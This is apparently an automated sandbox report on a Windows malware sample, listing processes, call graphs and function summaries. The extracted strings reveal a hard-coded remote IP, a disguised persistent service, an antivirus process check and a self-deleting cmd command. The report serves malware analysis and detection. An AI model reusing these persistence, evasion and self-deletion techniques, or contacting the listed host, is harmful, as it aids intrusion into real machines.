                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:16:12:40
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:16:12:40
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:16:13:03
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\splwow64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                                                        Imagebase:0x7ff6d5370000
                                                                                        File size:163'840 bytes
                                                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:16:13:04
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:28.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:7.3%
                                                                                          Total number of Nodes:179
                                                                                          Total number of Limit Nodes:4
                                                                                          execution_graph 465 402240 470 402270 #693 #641 465->470 467 40224f 468 402262 467->468 471 401de0 #825 467->471 470->467 471->468 473 402ac0 #800 474 401d80 479 401db0 #815 474->479 476 401d8f 477 401da2 476->477 480 401de0 #825 476->480 479->476 480->477 481 401fc6 496 402400 IsIconic 481->496 483 401ff2 484 401ffa #470 483->484 485 4020af 483->485 487 40201a 484->487 500 402470 #2379 485->500 497 4023d0 SendMessageA 487->497 488 4020ba 490 402028 GetSystemMetrics GetSystemMetrics 491 402046 490->491 498 402420 GetClientRect 491->498 493 402055 499 4023a0 DrawIcon 493->499 495 40209e #755 495->488 496->483 497->490 498->493 499->495 500->488 501 4010ce 504 401db0 #815 501->504 503 4010db 504->503 505 402b0f #755 506 402550 #693 507 402572 506->507 508 402569 506->508 510 401de0 #825 508->510 510->507 358 4028d2 __set_app_type __p__fmode __p__commode 359 402941 358->359 360 402955 359->360 361 402949 __setusermatherr 359->361 370 402a42 _controlfp 360->370 361->360 363 40295a _initterm __getmainargs _initterm 364 4029ae GetStartupInfoA 363->364 366 4029e2 GetModuleHandleA 364->366 371 402a60 #1576 366->371 369 402a06 exit _XcptFilter 370->363 371->369 513 4020dc 516 4023d0 SendMessageA 513->516 515 4020f1 516->515 517 40109e 522 4010ad 517->522 528 40107d #561 522->528 524 4010a6 525 4010bc 524->525 529 40289c 525->529 528->524 532 402870 529->532 531 4010ab 533 402885 __dllonexit 532->533 534 402879 _onexit 532->534 533->531 534->531 535 4024a0 EnableWindow 536 402aa1 537 402aa6 536->537 540 402a78 #1168 537->540 541 402a92 _setmbcp 540->541 542 402a9b 540->542 541->542 543 402b22 546 4022c0 #800 543->546 549 402510 #641 546->549 548 402300 549->548 550 402a24 _exit 551 401eed 554 402490 551->554 553 401f00 #2302 554->553 556 401e70 #324 563 402530 #567 556->563 558 401eac 564 402310 #1168 558->564 560 401ec3 565 4024e0 #1146 LoadIconA 560->565 562 401eca 563->558 564->560 565->562 566 402af0 #641 567 402b70 570 402510 #641 567->570 569 402b78 570->569 372 401134 #2621 Sleep GetCommandLineA strstr Sleep 373 401305 10 API calls 372->373 374 4011bf wsprintfA 372->374 375 4013e2 CloseHandle Sleep GetProcAddress 373->375 376 4013cd GetLastError 373->376 434 401c18 6 API calls 374->434 385 40142d Sleep ExpandEnvironmentStringsA Sleep GetFileAttributesA 375->385 376->375 403 4013da 376->403 379 401212 lstrcpyA 382 401c18 8 API calls 379->382 380 4012db 440 401b6b 9 API calls 380->440 384 401247 wsprintfA 382->384 387 401c18 8 API calls 384->387 388 4014e2 GetTickCount wsprintfA Sleep 385->388 389 401466 385->389 386 4012fe 386->403 392 4012d7 387->392 419 401aee 388->419 390 401491 #537 389->390 393 401478 ExpandEnvironmentStringsA 389->393 441 4016eb 390->441 392->380 399 401aee 4 API calls 392->399 393->388 397 401528 451 401b6b 9 API calls 397->451 398 40153a Sleep 424 401794 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress CreateToolhelp32Snapshot 398->424 399->380 400 4014e0 400->393 406 4015e0 Sleep GetProcAddress 409 401609 406->409 410 40160b 406->410 407 4016b3 408 4016d0 Sleep 407->408 433 401b6b 9 API calls 407->433 408->403 452 40187b LoadLibraryA GetProcAddress GetProcAddress GetProcAddress GetProcAddress 409->452 410->409 411 4016a6 FreeLibrary 410->411 415 401629 410->415 411->407 415->411 416 401688 417 401691 FreeLibrary 416->417 418 40169e Sleep 416->418 417->418 418->411 420 401b06 419->420 421 401b2f memcpy 420->421 423 40151f 420->423 458 401000 CreateFileA 421->458 423->397 423->398 425 401804 Process32First 424->425 426 401858 CloseHandle 424->426 429 401832 425->429 427 4015b2 LoadLibraryA 426->427 428 401868 FreeLibrary 426->428 427->406 427->407 428->427 429->426 430 401838 lstrcmpiA 429->430 432 401821 Process32Next 429->432 430->429 431 40184d 430->431 431->426 432->429 433->408 435 401ce4 434->435 436 401d14 lstrcpyA 435->436 437 401ce8 435->437 436->437 438 40120a 437->438 439 401d5b FreeLibrary 437->439 438->379 438->380 439->438 440->386 463 401e60 441->463 443 401713 _access 444 401722 443->444 445 4014bc #800 GetFileAttributesA 443->445 444->445 446 401730 #5683 #4129 444->446 445->388 445->400 447 4016eb 446->447 448 401763 #800 447->448 464 401e60 448->464 450 40177a _mkdir 450->445 451->403 453 40190f GetTickCount wsprintfA 452->453 455 401958 453->455 456 401972 FreeLibrary 455->456 457 401636 wsprintfA 455->457 456->457 457->416 459 401030 WriteFile 458->459 460 40102c 458->460 461 401052 CloseHandle 459->461 462 40104e 459->462 460->459 461->423 462->461 463->443 464->450 571 4020f5 #355 #2515 572 402166 571->572 573 40214f 571->573 584 402580 SendMessageA 572->584 574 4022c0 2 API calls 573->574 576 402161 574->576 577 402174 #540 #2818 578 4021a2 577->578 585 4025b0 #3998 578->585 580 4021b5 #3499 586 401e60 580->586 582 4021eb #6907 #800 #800 583 4022c0 2 API calls 582->583 583->576 584->577 585->580 586->582 587 401f35 #4710 596 402440 SendMessageA 587->596 589 401f58 597 402440 SendMessageA 589->597 591 401f6c #3996 598 4025e0 SendMessageA 591->598 593 401f93 #3996 599 4025e0 SendMessageA 593->599 595 401fbd 596->589 597->591 598->593 599->595 601 402af9 #693

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_00402240 28 Function_00401DE0 0->28 40 Function_00402270 0->40 1 Function_00401E40 2 Function_00402440 3 Function_004022C0 61 Function_00402510 3->61 4 Function_004024C0 5 Function_00402AC0 6 Function_00402A42 7 Function_00402B43 8 Function_00401FC6 12 Function_00402350 8->12 15 Function_004023D0 8->15 37 Function_00402470 8->37 42 Function_00402370 8->42 51 Function_00402400 8->51 68 Function_00402420 8->68 71 Function_00402320 8->71 72 Function_004023A0 8->72 80 Function_00402330 8->80 9 Function_004020C8 10 Function_00402ACC 11 Function_004010CE 81 Function_00401DB0 11->81 13 Function_00402550 13->28 14 Function_00402B50 16 Function_00401DD0 17 Function_004028D2 17->6 20 Function_00402A57 17->20 26 Function_00402A60 17->26 18 Function_00402A54 19 Function_00402AD6 21 Function_00402B59 22 Function_004020DC 22->15 23 Function_004010DD 24 Function_00402ADF 25 Function_00401E60 27 Function_004024E0 29 Function_004025E0 30 Function_00401063 31 Function_00401A63 55 Function_00401983 31->55 32 Function_00401B6B 33 Function_004016EB 33->25 33->33 69 Function_00401E20 33->69 34 Function_0040106D 35 Function_00401EED 59 Function_00402490 35->59 36 Function_00401AEE 36->23 36->31 50 Function_00401000 36->50 38 Function_00401E70 38->27 60 Function_00402310 38->60 79 Function_00402530 38->79 39 Function_00402870 41 Function_00402AF0 43 Function_00402B70 43->61 44 Function_004020F5 44->3 44->25 54 Function_00402580 44->54 82 Function_004025B0 44->82 45 Function_00402A78 46 Function_00402AF9 47 Function_00402B79 48 Function_0040187B 49 Function_0040107D 52 Function_00401E00 53 Function_00401D80 53->28 53->81 56 Function_00402B05 57 Function_00402B0F 58 Function_00401E10 62 Function_00401794 63 Function_00401C18 86 Function_00401D3A 63->86 64 Function_00402B18 65 Function_00401F1B 66 Function_0040289C 66->39 67 Function_0040109E 77 Function_004010AD 67->77 87 Function_004010BC 67->87 69->1 70 Function_004024A0 73 Function_00402AA1 73->45 74 Function_00402B22 74->3 75 Function_00402A24 76 Function_00401F25 77->49 78 Function_00402B2E 83 Function_00401134 83->32 83->33 83->36 83->48 83->62 83->63 84 Function_00401F35 84->2 84->29 85 Function_00402B37 87->66

                                                                                          Executed Functions

                                                                                          Function 00401794 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 67libraryloaderprocessCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004017A8
                                                                                          • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004017BA
                                                                                          • GetProcAddress.KERNEL32(?,Process32First), ref: 004017CF
                                                                                          • GetProcAddress.KERNEL32(?,Process32Next), ref: 004017E1
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004017F5
                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00401819
                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 0040182C
                                                                                          • lstrcmpiA.KERNEL32(00000000,?), ref: 00401843
                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0040185C
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040186C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryProcess32$CloseCreateFirstFreeHandleLoadNextSnapshotToolhelp32lstrcmpi
                                                                                          • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                          • API String ID: 653906424-4285911020
                                                                                          • Opcode ID: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                          • Instruction ID: e698cd54efef0762fd02a762dd22e0b3df5000b7872fc78e3db917c3bca36737
                                                                                          • Opcode Fuzzy Hash: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                          • Instruction Fuzzy Hash: 39210E75D41218EFDB10EFA0D949BEEBBB8FB48301F10846AE505B2290D7749B80CF54
                                                                                          Function 00401B6B Relevance: 24.5, APIs: 9, Strings: 5, Instructions: 48librarythreadloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,?), ref: 00401B80
                                                                                          • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00401B98
                                                                                          • __p__pgmptr.MSVCRT ref: 00401BBA
                                                                                          • sprintf.MSVCRT ref: 00401BCF
                                                                                          • GetCurrentProcess.KERNEL32(00000100), ref: 00401BDD
                                                                                          • SetPriorityClass.KERNELBASE(00000000), ref: 00401BE4
                                                                                          • GetCurrentThread.KERNEL32 ref: 00401BEC
                                                                                          • SetThreadPriority.KERNELBASE(00000000), ref: 00401BF3
                                                                                          • ShellExecuteA.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00401C10
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentPriorityThread$AddressClassExecuteLibraryLoadProcProcessShell__p__pgmptrsprintf
                                                                                          • String ID: /c ping 127.0.0.1 -n 1 && del /f/q "%s"$ShellExecuteA$cmd.exe$open$shell32.dll
                                                                                          • API String ID: 239697722-3584563708
                                                                                          • Opcode ID: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                          • Instruction ID: 03b7caf6ff0ed763f8f9b181b84943af9cfe637eb8e7dbc85a8f0fb9157acd93
                                                                                          • Opcode Fuzzy Hash: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                          • Instruction Fuzzy Hash: 5A11A171E44208ABEB109FA4DD0ABD9BB7CAB08702F0000B5F645F61D1CBF45A848F69
                                                                                          Function 00401134 Relevance: 115.8, APIs: 42, Strings: 24, Instructions: 337sleeplibraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 401134-4011b9 #2621 Sleep GetCommandLineA strstr Sleep 1 401305-4013cb Sleep LoadLibraryA GetProcAddress Sleep LoadLibraryA GetProcAddress Sleep GetProcAddress wsprintfA CreateMutexA 0->1 2 4011bf-40120c wsprintfA call 401c18 0->2 3 4013e2-401464 CloseHandle Sleep GetProcAddress Sleep ExpandEnvironmentStringsA Sleep GetFileAttributesA 1->3 4 4013cd-4013d8 GetLastError 1->4 9 401212-4012d9 lstrcpyA call 401c18 wsprintfA call 401c18 2->9 10 4012df 2->10 19 4014e2-401526 GetTickCount wsprintfA Sleep call 401aee 3->19 20 401466-40146d 3->20 4->3 6 4013da-4013dd 4->6 8 4016da-4016ea 6->8 28 4012db 9->28 29 4012dd-4012ee call 401aee 9->29 12 4012f3-401300 call 401b6b 10->12 12->8 32 401528-401535 call 401b6b 19->32 33 40153a-4015b4 Sleep call 401794 19->33 21 401491-4014de #537 call 4016eb #800 GetFileAttributesA 20->21 22 40146f-401476 20->22 21->19 35 4014e0 21->35 22->21 25 401478-40148f ExpandEnvironmentStringsA 22->25 25->19 28->12 29->12 32->8 40 4015c0-4015da LoadLibraryA 33->40 41 4015b6 33->41 35->25 42 4015e0-401607 Sleep GetProcAddress 40->42 43 4016b3-4016ba 40->43 41->40 46 401609 42->46 47 40160b-401612 42->47 44 4016d0-4016d8 Sleep 43->44 45 4016bc-4016c3 43->45 44->8 45->44 48 4016c5-4016cb call 401b6b 45->48 49 40162b-40168f call 40187b wsprintfA 46->49 50 4016a6-4016ad FreeLibrary 47->50 51 401618-401627 47->51 48->44 58 401691-401698 FreeLibrary 49->58 59 40169e-4016a0 Sleep 49->59 50->43 51->49 56 401629 51->56 56->50 58->59 59->50
                                                                                          APIs
                                                                                          • #2621.MFC42 ref: 00401162
                                                                                          • Sleep.KERNELBASE(00000000), ref: 0040116A
                                                                                          • GetCommandLineA.KERNEL32 ref: 00401170
                                                                                          • strstr.MSVCRT ref: 00401188
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004011AF
                                                                                          • wsprintfA.USER32 ref: 004011DE
                                                                                            • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C59
                                                                                            • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C69
                                                                                            • Part of subcall function 00401C18: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                            • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                            • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                            • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                            • Part of subcall function 00401C18: FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                          • lstrcpyA.KERNEL32(encvbk,?,80000002,?,DisplayName,00000001,System Remote Data Simulation Layer), ref: 0040121E
                                                                                            • Part of subcall function 00401C18: lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                          • wsprintfA.USER32 ref: 0040125A
                                                                                          • Sleep.KERNEL32(00000000), ref: 00401307
                                                                                          • LoadLibraryA.KERNELBASE(shell32.dll), ref: 00401312
                                                                                          • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 0040132A
                                                                                          • Sleep.KERNELBASE(00000000), ref: 00401338
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401343
                                                                                          • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 0040135B
                                                                                          • Sleep.KERNELBASE(00000001), ref: 00401369
                                                                                          • GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 0040137B
                                                                                          • wsprintfA.USER32 ref: 004013A4
                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 004013B8
                                                                                          • GetLastError.KERNEL32 ref: 004013CD
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004013F6
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004013FE
                                                                                          • GetProcAddress.KERNEL32(?,GetVersionExA), ref: 00401410
                                                                                          • Sleep.KERNELBASE(00000000), ref: 0040142F
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 00401446
                                                                                          • Sleep.KERNEL32(00000000), ref: 0040144E
                                                                                          • GetFileAttributesA.KERNELBASE(?), ref: 0040145B
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%Temp%\,?,00000104), ref: 00401489
                                                                                          • #537.MFC42(?), ref: 0040149E
                                                                                            • Part of subcall function 004016EB: _access.MSVCRT ref: 00401714
                                                                                          • #800.MFC42(?,?), ref: 004014C9
                                                                                          • GetFileAttributesA.KERNEL32(?,?,?), ref: 004014D5
                                                                                          • GetTickCount.KERNEL32 ref: 004014E2
                                                                                          • wsprintfA.USER32 ref: 004014FC
                                                                                          • Sleep.KERNEL32(00000000), ref: 00401507
                                                                                          • Sleep.KERNELBASE(00000000,00000000), ref: 00401546
                                                                                          • LoadLibraryA.KERNELBASE(00000000,360tray.exe), ref: 004015C7
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004015E2
                                                                                          • GetProcAddress.KERNEL32(00000000,Install), ref: 004015F4
                                                                                          • wsprintfA.USER32 ref: 00401662
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00401698
                                                                                          • Sleep.KERNEL32(00000000), ref: 004016A0
                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 004016AD
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004016D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$AddressProc$Library$wsprintf$Load$Free$AttributesEnvironmentExpandFileStringslstrcpymemset$#2621#537#800CloseCommandCountCreateErrorHandleLastLineMutexTick_accessstrstr
                                                                                          • String ID: "%s",MainThread$%ProgramFiles%\$%Temp%\$%s%d.dll$%s:%d:%s$103.36.221.195$360tray.exe$CreateMutexA$Description$DisplayName$GUpdate$GetVersionExA$Install$ReleaseMutex$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll$ShellExecuteA$System Remote Data Simulation Layer$encvbk$kernel32.dll$open$rundll32.exe$shell32.dll
                                                                                          • API String ID: 2440389195-3701194357
                                                                                          • Opcode ID: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                          • Instruction ID: 3e4d9021d073eed2ebaccca2140894c21fcc0a3ec56120faac2ae3b4723efbfb
                                                                                          • Opcode Fuzzy Hash: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                          • Instruction Fuzzy Hash: 68E17E70945258DFEB20DB64CD49BDEBB79AB44306F0041EAE109B62E1CB795F84CF29
                                                                                          Function 004028D2 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                          • String ID:
                                                                                          • API String ID: 801014965-0
                                                                                          • Opcode ID: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                          • Instruction ID: 41b20fb36615245da369ed675267998572c4bc05a5f1d3210e4b8a6eebd3b03a
                                                                                          • Opcode Fuzzy Hash: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                          • Instruction Fuzzy Hash: 1C415DB1A40308AFDB209FA4DA49A5ABFA8AB09711F20017FF451B73E1D7B84941CB59
                                                                                          Function 00401000 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 92 401000-40102a CreateFileA 93 401030-40104c WriteFile 92->93 94 40102c 92->94 95 401052-401062 CloseHandle 93->95 96 40104e 93->96 94->93 96->95
                                                                                          APIs
                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040101D
                                                                                          • WriteFile.KERNELBASE(000000FF,004032A0,00006600,?,00000000), ref: 00401044
                                                                                          • CloseHandle.KERNELBASE(000000FF), ref: 00401056
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                          • String ID:
                                                                                          • API String ID: 1065093856-0
                                                                                          • Opcode ID: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                          • Instruction ID: 0b57e97574c49083c60be4e0953d33bf3402ecf870afa031020ca03fe4ac14e9
                                                                                          • Opcode Fuzzy Hash: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                          • Instruction Fuzzy Hash: 36F06234E41348FBEB10DFA49D0AF9E7F785B04705F2081A4F6507B2C1C6B96B008B58
                                                                                          Function 00401AEE Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 97 401aee-401b29 call 4010dd call 401a63 102 401b2b-401b2d 97->102 103 401b2f-401b4e memcpy call 401000 97->103 104 401b65-401b68 102->104 106 401b53-401b5d 103->106 107 401b63 106->107 108 401b5f-401b61 106->108 107->104 108->104
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(-004032A0,103.36.221.195,00000228,?,?,?,?,?,?,0040151F), ref: 00401B42
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: 103.36.221.195
                                                                                          • API String ID: 3510742995-2989038800
